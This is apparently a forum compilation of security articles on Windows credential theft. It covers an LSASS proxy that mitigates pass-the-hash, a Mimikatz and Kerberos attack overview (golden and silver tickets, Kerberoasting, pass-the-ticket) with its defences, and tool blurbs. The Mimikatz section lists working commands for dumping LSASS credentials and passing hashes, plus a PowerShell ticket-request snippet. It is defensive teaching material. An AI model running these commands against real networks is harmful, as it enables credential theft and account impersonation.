For the MSV1_0 proxy, the SpAddCredentialsPackage function needed to be proxied by saving the original pointer and placing a pointer to the new one into the returned function table in its place. This is where the incoming NTLM credentials would be intercepted and modified before being passed on to the real MSV1_0 (via its SpAddCredentialsPackage) and stored/cached. 
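The function-table swap can be illustrated with a toy sketch. This is ordinary Python standing in for the C SSP/AP: the dict plays the role of the function table returned by SpLsaModeInitialize, and the helper names (build_proxy_table, CACHE, the creds dict) are invented for illustration, not part of the Win32 API:

```python
# Toy model of proxying one entry in a package's function table. In the real
# proxy this is a C DLL: save the original SpAddCredentialsPackage pointer,
# place your own function in the table, and forward calls to the original.

CACHE = []  # stands in for LSASS's credential cache

def original_sp_add_credentials(creds):
    """Stand-in for the real MSV1_0 SpAddCredentialsPackage."""
    CACHE.append(creds)
    return 0  # STATUS_SUCCESS

def build_proxy_table(original_table):
    """Copy the original function table, swapping in a proxied entry."""
    original_fn = original_table["SpAddCredentialsPackage"]

    def proxy_fn(creds):
        # Interception point: inspect/modify creds, then forward.
        creds = dict(creds, intercepted=True)
        return original_fn(creds)

    proxied = dict(original_table)
    proxied["SpAddCredentialsPackage"] = proxy_fn
    return proxied

# LSASS stand-in: build the table once, then call through it as usual.
table = build_proxy_table({"SpAddCredentialsPackage": original_sp_add_credentials})
status = table["SpAddCredentialsPackage"]({"PackageName": "NTLM"})
```

Callers that bypass the table entirely would instead hit the DLL's exported entry points, which is why the real proxy also forwards the original exports (the second set of calls mentioned above).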
In the new function, I wanted to be selective about which logon types had their credentials scrambled, as I still wanted local services to be able to start up and authenticate with the local system. To do this, I checked the incoming SECURITY_LOGON_TYPE parameter for the service type (or any other type that you want to allow to cache NTLM credentials - preferably only local accounts) and, for those, just passed through to the original function and returned. For everything else, I grabbed the PSECPKG_SUPPLEMENTAL_CRED structure and verified that the package name was "NTLM". If this was the case, I scrambled the LmPassword and NtPassword parts of that structure. Once that was done, I just called the original function, passing in the scrambled supplemental credentials to the real MSV1_0. MSV1_0 takes them and LSASS will cache the useless hash in its memory.

KERBEROS

For the KERBEROS proxy (and the MSV1_0 proxy, if you wish to also handle the hash coming from an interactive login at an earlier point in the process), I proxied and modified LsaApLogonUserEx2. In this case, I called the original as normal and intercepted the credentials being returned from that call. At that point, I used the same logic to check and scramble the supplemental (NTLM) credentials before returning. One other place that the credentials can be intercepted is at the point just prior to going into LSASS itself. This requires intercepting the proxied package's call to LSASS's AddCredentials function, which is passed in via a function table during SpInitialize. In this case, the AddCredentials pointer is replaced by a pointer to a new function before passing the table to the original package, such that when the original package calls that function to add credentials, it goes through the proxied function first. In the proxied function, the credentials need to be unwrapped via LsaUnprotectMemory, scrambled, and then re-wrapped via LsaProtectMemory before being passed into LSASS. 
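As a rough sketch of the selective scrambling described for the MSV1_0 proxy (Python stand-in for the C code; the logon-type constant and dict fields only loosely mirror SECURITY_LOGON_TYPE and PSECPKG_SUPPLEMENTAL_CRED, and overwriting with random bytes is just one way to "scramble"; the LsaUnprotectMemory/LsaProtectMemory round-trip at the AddCredentials layer is omitted here):

```python
import os

SERVICE_LOGON_TYPE = 5  # SECURITY_LOGON_TYPE value for Service logons

def scramble(blob):
    # Overwrite the hash with random bytes of the same length so the copy
    # that LSASS caches is useless to a hash-stealing tool.
    return os.urandom(len(blob))

def proxied_add_credentials(logon_type, cred, original_fn):
    # Let service logons keep real credentials so local services still work.
    if logon_type == SERVICE_LOGON_TYPE:
        return original_fn(cred)
    # For everything else, mangle the NTLM material before it is cached.
    if cred["PackageName"] == "NTLM":
        cred["LmPassword"] = scramble(cred["LmPassword"])
        cred["NtPassword"] = scramble(cred["NtPassword"])
    return original_fn(cred)
```

With this logic, an interactive logon reaches the cache with junk LmPassword/NtPassword values, while a service logon passes through untouched.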
Intercepting AddCredentials in this way should not be necessary, but it can be used as a failsafe.

Using the Proxies

After the proxies were completed, they needed to be put to use. There are two methods of doing this, with pros and cons to each. First, one can simply rename the DLL being proxied to something else while using the real name (msv1_0.dll or kerberos.dll) for the proxy. Second, the original DLLs can keep the same name, using different names for the proxies while changing the registry entries for the Security Packages and/or Authentication Packages. For the former, the risk is that the proxy DLL may be overwritten when a patch/update intended for Microsoft's DLLs comes down the line. For the latter, someone with access to view those registry keys may notice the names are not what they are supposed to be.

Choosing a Proxy

In the end I chose to use the MSV1_0 proxy over the Kerberos proxy in order to catch hashes that may come from other packages/programs. When a set of credentials comes into LSASS, it is sent to the appropriate package for handling. In the case of NTLM credentials, they are sent to the MSV1_0 package. You could easily switch to using the Kerberos proxy, catching and scrubbing the supplemental credentials after returning from kerberos.dll in LsaApLogonUserEx2(). This, however, will not catch any NTLM hashes coming from outside of Kerberos. Alternatively, one could use both proxies as opposed to the minimum required to catch most cases.

Summary

With this technique, a good majority of automated/default Pass-the-Hash attacks can be mitigated. While there is still a hash cached/stored in memory by LSASS, that hash has been scrambled and is therefore useless. If your systems use NTLM authentication then it probably means that SSO will no longer work, resulting in endless login prompts when attempting to use remote resources. It's really only useful for networks that want to force Kerberos at the expense of legacy compatibility. 
Also, I need to reiterate that this does not solve the whole problem. There are other issues, which I will not go into, that my team had to solve, such as protecting the proxies from attack. A sophisticated attacker has several methods by which this can be easily defeated if it is not protected. The proxies do absolutely nothing to mitigate an attacker intercepting credentials in other ways, such as across the network or Pass-the-Ticket. It does help narrow the available target a little bit, and every little bit helps.

One final note to keep in mind for anyone following in these footsteps. Mucking around with LSASS can get pretty messy. If you get something wrong you will not know until you've already told LSASS to load up your modules, in which case a crash of LSASS (assuming you don't blue screen) can prevent you from logging into that system again normally. I would advise that you test your development thoroughly using a VM, and once you do try it on a live system be prepared to revert, use a boot disc, or mount the hard drive via another system to fix it. Take heed of that if you are deploying it across a domain. I hope someone finds this useful. It's primarily targeted towards Windows XP and Windows 7, but may continue to apply to Windows 8 as well depending on how Microsoft works the Pass-the-Hash issue.

-=[Kevin]=-

Addendum A - DeleteSecurityPackage

During my research and development relating to using SSP/APs and SSPs, I came across an issue with DeleteSecurityPackage that threw me for a loop. I was working on a system that would remove unauthorized Security Packages on a live system. Research led me to this function in the Windows security API - a function that was documented on MSDN as: "Deletes a security support provider from the list of providers supported by Microsoft Negotiate." Attempting to use this function, however, failed. Upon use, the return value from the function was 0x80090302 (SEC_E_UNSUPPORTED_FUNCTION). 
That didn't seem right since it was documented, and I had not found anything while searching the internet from anyone else to say otherwise. After double checking and ensuring that there was no error on my part, I broke out my trusty IDA Pro and decided to trace the function back to its roots. After following several proxied jumps I got to the source function DeleteSecurityPackageW (DeleteSecurityPackageA also redirects to this function). Here is what I found: apparently either Microsoft forgot to implement the function, or more likely discovered that it was a pretty hard problem to tackle without making any assumptions for the end user and decided not to implement it (while leaving the documentation online). To give them some credit, it does seem like it would be a difficult problem - when you remove a security package currently in use, what is your default policy for dealing with accounts logged in using that package? Do you kick them, keep them logged in (if that's possible), or prevent removal until they log out? Maybe they decided it was better to just avoid the question altogether. It's not entirely bad that it's not implemented. It means that in order to remove a security package (such as to replace it), typically a reboot is going to be required, as LSASS will force one if you try to remove it any other way. Who knows? Anyway, I e-mailed MSDN support and posted a notice on the MSDN documentation page, but never got a response... so there it is if anyone else is having an issue using it.

Addendum B - EnumerateSecurityPackages

Another issue that I came across while working with the Windows security APIs relating to LSASS was while using EnumerateSecurityPackages. I needed to use this function in order to monitor what security packages were loaded in order to detect if any were unauthorized. Initially, when I tested this function manually, everything was working fine. 
Each time I ran my test it showed me all of the currently loaded security packages, including any that I manually loaded after boot using AddSecurityPackage. Once I automated the process to periodically call the function, I started seeing problems. What would happen is that when a process first called this function, it would populate a list with all of the security packages that it saw loaded. Subsequent calls would return the very same list. I double checked and was using FreeContextBuffer just as the documentation specified, but nothing changed. This was a rather annoying issue that I had to somehow overcome. My solution (and my recommended solution if it has not been fixed yet) was to embed a second binary into the parent binary which would be dropped and spawned by the parent each time it needs to be checked. The output of the spawn is easily wrapped and captured by the parent. The spawn can either be a temporary drop or a permanent drop executed periodically by the parent monitoring system. Since only the parent is constantly running, the spawn only needs to make that call and grab the list once per execution. Another e-mail and another post to the documentation on MSDN without a response. It may or may not have been fixed by now, but just in case, here's one workaround.

References

Koby Kahane, 2008 - http://kobyk.wordpress.com/2008/08/30/implementing-an-lsa-proxy-authentication-package/
SANS Institute - "Pass-the-hash attacks: Tools and Mitigation" - Bashar Ewaida, 2010
Kerberos Working Group - Johansson, 2009
Core Labs - Hernan Ochoa
...and my former team at MacAulay-Brown...

EDITS: 20140327 - Added the definition of mitigation to the top in order to prevent any misunderstandings. Added the twitter handle for @passthehash in the introduction.

Posted by Kevin Keathley at 5:44 AM

Sursa: http://cybernigma.blogspot.ro/2014/03/using-sspap-lsass-proxy-to-mitigate.html
  9. Mimikatz and Active Directory Kerberos Attacks

by Sean Metcalf

Mimikatz is the latest, and one of the best, tools to gather credential data from Windows systems. In fact I consider Mimikatz to be the “swiss army knife” of Windows credentials – that one tool that can do everything. Since the author of Mimikatz, Benjamin Delpy, is French, most of the resources describing Mimikatz usage are in French, at least on his blog. The Mimikatz GitHub repository is in English and includes useful information on command usage. Mimikatz is a Windows x32/x64 program coded in C by Benjamin Delpy (@gentilkiwi) in 2007 to learn more about Windows credentials (and as a Proof of Concept). There are two optional components that provide additional features, mimidrv (driver to interact with the Windows kernel) and mimilib (AppLocker bypass, Auth package/SSP, password filter, and sekurlsa for WinDBG). Mimikatz requires administrator or SYSTEM and often debug rights in order to perform certain actions and interact with the LSASS process (depending on the action requested). After a user logs on, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service, LSASS, process in memory. This is meant to facilitate single sign-on (SSO), ensuring a user isn’t prompted each time resource access is requested. The credential data may include NTLM password hashes, LM password hashes (if the password is <15 characters), and even clear-text passwords (to support WDigest and SSP authentication, among others). While you can prevent a Windows computer from creating the LM hash in the local computer SAM database (and the AD database), this doesn’t prevent the system from generating the LM hash in memory. 
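To make "NTLM password hash" concrete: the NT hash is simply MD4 over the UTF-16LE encoding of the password, with no salt - which is part of why pass-the-hash and precomputed cracking work so well. Since modern hashlib builds often no longer ship MD4, here is a minimal pure-Python MD4 (per RFC 1320) as an illustration; a teaching sketch, not hardened crypto code:

```python
import struct

def _rotl(x, s):
    return ((x << s) | (x >> (32 - s))) & 0xFFFFFFFF

def md4(data):
    # RFC 1320 padding: 0x80, zeros, then the 64-bit little-endian bit length.
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)

    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z

    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):  # round 1: words in order, shifts 3/7/11/19
            a, b, c, d = d, _rotl((a + F(b, c, d) + X[i]) & 0xFFFFFFFF,
                                  (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2: column order, constant sqrt(2)
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, _rotl((a + G(b, c, d) + X[k] + 0x5A827999) & 0xFFFFFFFF,
                                  (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3: bit-reversed order, constant sqrt(3)
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, _rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & 0xFFFFFFFF,
                                  (3, 9, 11, 15)[i % 4]), b, c
        h = [(v + w) & 0xFFFFFFFF for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)

def nt_hash(password):
    return md4(password.encode("utf-16le")).hex()
```

Note there is no per-user salt anywhere in the computation, so two accounts with the same password have the same NT hash, and a stolen hash is directly usable or crackable offline.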
The majority of Mimikatz functionality is available in PowerSploit (PowerShell Post-Exploitation Framework) through the “Invoke-Mimikatz” PowerShell script which “leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the mimikatz binary to disk.” Mimikatz functionality supported by Invoke-Mimikatz is noted below. Benjamin Delpy posted an Excel chart on OneDrive (shown below) that shows what type of credential data is available in memory (LSASS), including on Windows 8.1 and Windows 2012 R2, which have enhanced protection mechanisms reducing the amount and type of credentials kept in memory.

One of the biggest security concerns with Windows today is “Pass the Hash.” Simply stated, Windows performs a one-way hash function on the user’s password and the result is referred to as a “hash.” The one-way hash algorithm changes the password in expected ways given the input data (the password), with the result being scrambled data that can’t be reverted back to the original input data, the password. Hashing a password into a hash is like putting a steak through a meat grinder to make ground beef – the ground beef can never be put together to be the same steak again. Pass the Hash has many variants, from Pass the Ticket to OverPass the Hash (aka pass the key). The following quote is a Google Translate English translated version of the Mimikatz website (which is in French). 
Contrary to what could easily be imagined, Windows does not use the password of the user as a shared secret, but non-reversible derivatives: LM hash, NTLM, DES keys, AES … According to the protocol, the secret and the algorithms used are different:

[TABLE]
[TR]
[TH] Protocol[/TH]
[TH] Algorithm[/TH]
[TH] Secret used[/TH]
[/TR]
[TR]
[TD] LM[/TD]
[TD] DES-ECB[/TD]
[TD] LM Hash[/TD]
[/TR]
[TR]
[TD] NTLMv1[/TD]
[TD] DES-ECB[/TD]
[TD] NT Hash[/TD]
[/TR]
[TR]
[TD] NTLMv2[/TD]
[TD] HMAC-MD5[/TD]
[TD] NT Hash[/TD]
[/TR]
[/TABLE]

Mimikatz OS support:
Windows XP
Windows Vista
Windows 7
Windows 8
Windows Server 2003
Windows Server 2008 / 2008 R2
Windows Server 2012 / 2012 R2
Windows 10 (beta support)

Since Windows encrypts most credentials in memory (LSASS), they should be protected, but it is reversible encryption, so the clear-text credentials can be recovered. Encryption is done with LsaProtectMemory and decryption with LsaUnprotectMemory.
NT5 encryption types: RC4 & DESx
NT6 encryption types: 3DES & AES

Mimikatz capabilities:
Dump credentials from LSASS (Windows Local Security Account database) [sekurlsa module]
MSV1.0: hashes & keys (dpapi)
Kerberos password, ekeys, tickets, & PIN
TsPkg (password)
WDigest (clear-text password)
LiveSSP (clear-text password)
SSP (clear-text password)
[*]Generate Kerberos Golden Tickets (Kerberos TGT logon token ticket attack)
[*]Generate Kerberos Silver Tickets (Kerberos TGS service ticket attack)
[*]Export certificates and keys (even those not normally exportable).
[*]Dump cached credentials
[*]Stop event monitoring.
[*]Bypass Microsoft AppLocker / Software Restriction Policies
[*]Patch Terminal Server
[*]Basic GPO bypass

Items in bold denote functionality provided by the PowerSploit Invoke-Mimikatz module with built-in parameters. Other mimikatz commands may work using the command parameter.

Mimikatz Command Overview:

The primary command components are sekurlsa, kerberos, crypto, vault, and lsadump. 
Sekurlsa interacts with the LSASS process in memory to gather credential data and provides enhanced capability over kerberos.

The Mimikatz kerberos command set enables modification of Kerberos tickets and interacts with the official Microsoft Kerberos API. This is the command that creates Golden Tickets. Pass the ticket is also possible with this command since it can inject Kerberos ticket(s) (TGT or TGS) into the current session. External Kerberos tools may be used for session injection, but they must follow the Kerberos credential format (KRB_CRED). Mimikatz kerberos also enables the creation of Silver Tickets, which are Kerberos tickets (TGT or TGS) with arbitrary data enabling AD user/group impersonation. The key required for ticket creation depends on the type of ticket being generated: Golden tickets require the KRBTGT account NTLM password hash; Silver tickets require the computer or service account’s NTLM password hash.

Crypto enables export of certificates on the system that are not marked exportable, since it bypasses the standard export process.

Vault enables dumping data from the Windows vault.

Lsadump enables dumping credential data from the Security Account Manager (SAM) database, which contains the NTLM (and sometimes the LM) hash, and supports online and offline mode, as well as dumping credential data from the LSASS process in memory. Lsadump can also be used to dump cached credentials. In a Windows domain, credentials are cached (up to 10) in case a Domain Controller is unavailable for authentication. However, these credentials are stored on the computer. These caches are located in the registry at HKEY_LOCAL_MACHINE\SECURITY\Cache (accessible only as SYSTEM). These entries are encrypted symmetrically, but they contain some information about the user, as well as enough material to verify a hash for authentication. Further down is a more detailed list of mimikatz command functionality. 
Common Kerberos Attacks:

Pass The Hash

On Windows, a user provides the userid and password and the password is hashed, creating the password hash. When the user on one Windows system wants to access another, the user’s password hash is sent (passed) to the destination’s resource to authenticate. This means there is no need to crack the user’s password since the user’s password hash is all that’s needed to gain access. Contrary to what could easily be imagined, Windows does not use the password of the user as a shared secret, but non-reversible derivatives: LM hash, NTLM, DES keys, AES …

Pass the Ticket (Google Translation)

Extract an existing, valid Kerberos ticket from one machine and pass it to another one to gain access to resources as that user.

Over-Pass The Hash (aka Pass the Key) (Google Translation)

Use the NTLM hash to obtain a valid user Kerberos ticket request. The user key (NTLM hash when using RC4) is used to encrypt the Pre-Authentication & first data requests. The following quote is a Google Translate English translated version of the Mimikatz website (which is in French): Authentication via Kerberos is a tad different. The client encrypts a timestamp with its user secret, possibly with realm parameters and an iteration number sent from the server. If the secret is correct, the server can decrypt the timestamp (and in passing verify that the clocks are not too far out of sync).

[TABLE]
[TR]
[TH] Protocol[/TH]
[TH] Secret (key) used[/TH]
[/TR]
[TR]
[TD] Kerberos[/TD]
[TD] DES[/TD]
[/TR]
[TR]
[TD] RC4 = NT Hash![/TD]
[/TR]
[TR]
[TD] AES128[/TD]
[/TR]
[TR]
[TD] AES256[/TD]
[/TR]
[/TABLE]

Yes, the RC4 key type, available and enabled by default from XP through 8.1, is our NT hash!

Kerberos Golden Ticket (Google Translation)

The Kerberos Golden Ticket is a valid TGT Kerberos ticket since it is encrypted/signed by the domain Kerberos account (KRBTGT). 
The TGT is only used to prove to the KDC service on the Domain Controller that the user was authenticated by another Domain Controller. The fact that the TGT is encrypted by the KRBTGT password hash and can be decrypted by any KDC service in the domain proves it is valid.

Golden Ticket Requirements:
* Domain Name [AD PowerShell module: (Get-ADDomain).DNSRoot]
* Domain SID [AD PowerShell module: (Get-ADDomain).DomainSID.Value]
* Domain KRBTGT Account NTLM password hash
* UserID for impersonation.

The Domain Controller KDC service doesn’t perform PAC validation until the TGT is more than 20 minutes old, which means the attacker can make the ticket state the user with the TGT is a member of any group in Active Directory and the DC accepts it (until the 21st minute), and the PAC data (group membership) is placed in the TGS without validation. Microsoft’s MS-KILE specification (section 5.1.3): “Kerberos V5 does not provide account revocation checking for TGS requests, which allows TGT renewals and service tickets to be issued as long as the TGT is valid even if the account has been revoked. KILE provides a check account policy (section 3.3.5.7.1) that limits the exposure to a shorter time. KILE KDCs in the account domain are required to check accounts when the TGT is older than 20 minutes. This limits the period that a client can get a ticket with a revoked account while limiting the performance cost for AD queries.” Since the domain Kerberos policy is set on the ticket when generated by the KDC service on the Domain Controller, when the ticket is provided, systems trust the ticket validity. This means that even if the domain policy states a Kerberos logon ticket (TGT) is only valid for 10 hours, if the ticket states it is valid for 10 years, it is accepted as such. The KRBTGT account password is never changed* and the attacker can create Golden Tickets until the KRBTGT password is changed (twice). 
Note that a Golden Ticket created to impersonate a user persists even if the impersonated user changes their password. This crafted TGT requires an attacker to have the Active Directory domain’s KRBTGT password hash (typically dumped from a Domain Controller). The KRBTGT NTLM hash can be used to generate a valid TGT (using RC4) to impersonate any user with access to any resource in Active Directory. The Golden Ticket (TGT) can be generated and used on any machine, even one not domain-joined. The created TGT can be used without requiring Debug rights.

Mitigation:
* Limit Domain Admins from logging on to any computers other than Domain Controllers and a handful of Admin servers (don’t let other admins log on to these servers); delegate all other rights to custom admin groups. This greatly reduces the ability of an attacker to gain access to a Domain Controller’s Active Directory database. If the attacker can’t access the AD database (ntds.dit file), they can’t get the KRBTGT account NTLM password hash.
* Configuring Active Directory Kerberos to only allow AES may prevent Golden Tickets from being created.
* Another mitigation option is Microsoft KB2871997, which back-ports some of the enhanced security in Windows 8.1 and Windows 2012 R2.

Kerberos Silver Ticket

The Kerberos Silver Ticket is a valid Ticket Granting Service (TGS) Kerberos ticket since it is encrypted/signed by the service account configured with a Service Principal Name for each server the Kerberos-authenticating service runs on. While a Golden Ticket is encrypted/signed with the KRBTGT, a Silver Ticket is encrypted/signed by the service account (computer account credential extracted from the computer’s local SAM or service account credential). We know from the Golden Ticket attack (described above) that the PAC isn’t validated for TGTs until they are older than 20 minutes. 
Most services don’t validate the PAC (by sending the TGS to the Domain Controller for PAC validation), so a valid TGS generated with the service account password hash can include a PAC that is entirely fictitious – even claiming the user is a Domain Admin without challenge or correction. Since service tickets are identical in format to TGTs, albeit with a different service name, all you need to do is specify a different service name and use the RC4 (NTLM hash) of the account password (either the computer account for default services or the actual account) and you can now issue service tickets for the requested service. Note: You can also use the AES keys if you happen to have them instead of the NTLM key and it will still work. It is worth noting that tickets for services like MSSQL, SharePoint, etc. will only allow you to play with those services. The computer account will allow access to CIFS, service creation, and a whole host of other activities on the targeted computer. You can leverage the computer account into a shell with PSEXEC and you will be running as SYSTEM on that particular computer. Lateral movement is then a matter of doing whatever you need to do from there.
http://passing-the-hash.blogspot.com/2014/09/pac-validation-20-minute-rule-and.html

Service Account Password Cracking by attacking the Kerberos Session Ticket (TGS)

NOTE: This attack does NOT require hacking tools on the network since it can be performed offline. The Kerberos session ticket (TGS) has a component that is encrypted with the service’s (either computer account or service account) password hash. The TGS for the service is generated and delivered to the user after the user’s TGT is presented to the KDC service on the Domain Controller. Since the service account’s password hash is used to encrypt the server component, it is possible to request the service TGS and perform an offline password attack. 
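The offline attack can be illustrated with a toy simulation. To be clear about assumptions: real RC4-HMAC (etype 23) service tickets are protected with HMAC-MD5 keyed by the service account's NT hash (MD4 of the UTF-16LE password); the sketch below keeps the HMAC-MD5 shape but derives the key with MD5 and uses an invented "ticket" layout, purely so it runs anywhere:

```python
import hashlib
import hmac

def toy_key(password):
    # Stand-in key derivation (the real etype-23 key is MD4(UTF-16LE(pw))).
    return hashlib.md5(password.encode("utf-16le")).digest()

def issue_toy_tgs(service_password):
    # The KDC hands any authenticated user a TGS whose service part is
    # protected with the service account's key; the layout here is invented.
    plaintext = b"KRB_TGS|HTTP/sharepoint.adsecurity.org|client=someuser"
    mac = hmac.new(toy_key(service_password), plaintext, hashlib.md5).digest()
    return plaintext + mac  # last 16 bytes are the MAC

def crack_offline(ticket, wordlist):
    # Offline: no traffic to the DC - just try candidate keys against the blob.
    plaintext, mac = ticket[:-16], ticket[-16:]
    for candidate in wordlist:
        guess = hmac.new(toy_key(candidate), plaintext, hashlib.md5).digest()
        if hmac.compare_digest(guess, mac):
            return candidate
    return None

ticket = issue_toy_tgs("Summer2015!")  # captured via a normal TGS request
found = crack_offline(ticket, ["123456", "P@ssw0rd", "Summer2015!"])
```

Because each guess is just a local computation, rate limiting and lockout policies on the domain never come into play, which is why long, complex service account passwords are the mitigation.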
Only normal Kerberos traffic is observed on the wire: the TGT is delivered to the Domain Controller along with a TGS request and response. After that, no further network traffic is required. Service accounts typically have weak passwords and are rarely changed, making them excellent targets. Computer account passwords are changed about every 30 days and are extremely complex, making them virtually uncrackable. Finding interesting service accounts is as simple as sending a Service Principal Name query to the Global Catalog. Service accounts often have elevated rights in Active Directory, and since only a Kerberos service ticket (TGS) is required to attack the service account's password, getting a TGS and saving it to another system to crack the password makes this a difficult attack to stop.

Mitigation: Ensure all service accounts have long (>25 characters), complex passwords and only the exact rights required (enforce the principle of least privilege).

Tim Medin (@timmedin) describes this attack in his "Attacking Microsoft Kerberos: Kicking the Guard Dog of Hades" presentation at DerbyCon 2014 [slides: https://www.dropbox.com/s/1j6v6zbtsdg1kam/Kerberoast.pdf?dl=0 ]. In that presentation, Tim Medin provided PowerShell code examples for requesting a TGS; I have modified it slightly to add the $SPN variable.

$SPN = "HTTP/sharepoint.adsecurity.org"
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "$SPN"

Pass the Cache (*nix systems)

Linux/Unix systems (including Mac OS X) store Kerberos credentials in a cache file. As of 11/23/2014, Mimikatz supports extracting this credential data and passing it to Active Directory in a manner similar to Pass the Hash / Pass the Ticket.
Mimikatz Commands:

- logonpasswords (mimikatz # sekurlsa::logonpasswords): extracts passwords in memory.
- pth, pass the hash (mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a): a fake identity is created and the fake identity's NTLM hash is replaced with the real one. "ntlm hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable)". "AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case you can avoid ntlm hash."
- ptt, pass the ticket (mimikatz # kerberos::ptt): enables Kerberos ticket (TGT or TGS) injection into the current session.
- tickets (mimikatz # sekurlsa::tickets /export): identifies all session Kerberos tickets and lists/exports them. sekurlsa pulls the Kerberos data from memory and can access all user session tickets on the computer.
- ekeys (mimikatz # sekurlsa::ekeys): extracts the Kerberos ekeys from memory. Provides theft of a user account until the password is changed (which may be never for a smartcard/PKI user).
- dpapi (mimikatz # sekurlsa::dpapi)
- minidump (mimikatz # sekurlsa::minidump lsass.dmp): performs a minidump of the LSASS process and extracts credential data from lsass.dmp. A minidump can be saved off the computer for credential extraction later, but the major version of Windows must match (you can't open a dump file from Windows 2012 on a Windows 2008 system).
- kerberos (mimikatz # sekurlsa::kerberos): extracts the smartcard/PIV PIN from memory (cached in LSASS when using a smartcard).
- debug (mimikatz # privilege::debug): sets debug mode for the current Mimikatz session, enabling LSASS access.
- lsadump cache (mimikatz # lsadump::cache, requires token::elevate to become SYSTEM): dumps cached Windows domain credentials from HKEY_LOCAL_MACHINE\SECURITY\Cache (accessible by SYSTEM).
References:

- Benjamin Delpy's blog (Google Translate English translated version)
- Mimikatz GitHub repository
- Mimikatz GitHub wiki
- Mimikatz 2 presentation slides (Benjamin Delpy, July 2014)
- All Mimikatz presentation resources on blog.gentilkiwi.com
- Excel chart on OneDrive showing what type of credential data is available in memory (LSASS), including on Windows 8.1 and Windows 2012 R2, which have enhanced protection mechanisms
- PAC validation issue, aka the Silver Ticket, description from the Passing the Hash blog

Source: http://adsecurity.org/?p=556
  10. Pass-the-hash attacks: Tools and Mitigation

GIAC (GCIH) Gold Certification
Author: Bashar Ewaida, bashar9090@live.com
Advisor: Kristof Boeynaems
Accepted: January 21st 2010
Copyright SANS Institute; author retains full rights.

Abstract: Although pass-the-hash attacks have been around for a little over thirteen years, knowledge of their existence is still poor. This paper tries to fill a gap in the knowledge of this attack through testing of the freely available tools that facilitate the attack. While other papers and resources focus primarily on running the tools and sometimes comparing them, this paper offers an in-depth, systematic comparison of the tools across the various Windows platforms, including AV detection rates. It also provides extensive advice to mitigate pass-the-hash attacks and discusses the pros and cons of some of the approaches used in mitigating the attack.

Download: https://www.sans.org/reading-room/whitepapers/testing/pass-the-hash-attacks-tools-mitigation-33283
  11. Reducing the Effectiveness of Pass-the-Hash

National Security Agency/Central Security Service, Information Assurance Directorate

Contents:
1 Introduction
2 Background
3 Mitigations
3.1 Creating unique local account passwords
3.2 Denying local accounts from network logons
3.3 Restricting lateral movement on the network with firewall rules
4 Windows 8.1 Features
4.1 Deny local accounts from network logons in Windows 8.1
4.2 New Remote Desktop feature in Windows 8.1
4.3 Protecting LSASS
4.4 Clearing credentials
4.5 Protected Users group
5 Conclusion
6 References
Appendix A: Creating unique local passwords
Appendix B: Denying local administrators network access
Appendix C: Configuring Windows Firewall rules
Appendix D: Looking for possible PtH activity by examining Windows Event Logs
Appendix E: Summary of Local Accounts
Appendix F: Windows smartcard credentials

Download: https://www.nsa.gov/ia/_files/app/Reducing_the_Effectiveness_of_Pass-the-Hash.pdf
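The "creating unique local account passwords" mitigation (section 3.1 and Appendix A) can be illustrated by deriving each machine's local Administrator password from a master secret and the hostname, so that a hash stolen from one host cannot be replayed against another. The sketch below is a hypothetical illustration of that idea, not the paper's scheme (Microsoft's LAPS, for instance, instead stores independently randomized passwords in AD); the HMAC construction and 25-character length are my assumptions.

```python
import hashlib
import hmac
import string

ALPHABET = string.ascii_letters + string.digits

def local_admin_password(master_secret, hostname, length=25):
    # Deterministically derive a per-host password: same inputs always
    # yield the same password, different hostnames yield different ones,
    # so one machine's hash is useless against its neighbors.
    digest = hmac.new(master_secret, hostname.lower().encode(),
                      hashlib.sha256).digest()
    return "".join(ALPHABET[b % len(ALPHABET)] for b in digest[:length])
```

The point of the construction is only that local account hashes stop being interchangeable across machines, which is exactly what pass-the-hash lateral movement depends on.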
  12. [h=3]WPScan[/h]

WPScan is a black box WordPress vulnerability scanner.

Features:
- Username enumeration (from author querystring and Location header)
- Weak password cracking (multithreaded)
- Version enumeration (from generator meta tag and from client-side files)
- Vulnerability enumeration (based on version)
- Plugin enumeration (2220 most popular by default)
- Plugin vulnerability enumeration (based on plugin name)
- Plugin enumeration list generation
- Other misc WordPress checks (theme name, dir listing, …)

URL: http://wpscan.org
Source: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
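The "username enumeration (from author querystring and Location header)" feature relies on WordPress redirecting /?author=N to /author/<username>/, so the redirect's Location header leaks the login name. A minimal sketch of the header parsing (the URL shape is the standard WordPress author permalink; the function name is mine):

```python
import re

def username_from_location(location_header):
    # WordPress answers /?author=N with a redirect whose Location
    # header ends in /author/<username>/ -- extract that username.
    match = re.search(r"/author/([^/?#]+)", location_header)
    return match.group(1) if match else None
```

Iterating author IDs 1, 2, 3, ... and collecting the extracted names yields the site's user list without ever guessing a password.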
  13. [h=3]Brakeman[/h]

Brakeman is a security scanner for Ruby on Rails applications. Unlike many web security scanners, Brakeman looks at the source code of your application. This means you do not need to set up your whole application stack to use it. Once Brakeman scans the application code, it produces a report of all security issues it has found.

Features:
- No Configuration Necessary
- Run It Anytime
- Better Coverage
- Best Practices
- Flexible Testing
- Speed

URL: http://brakemanscanner.org
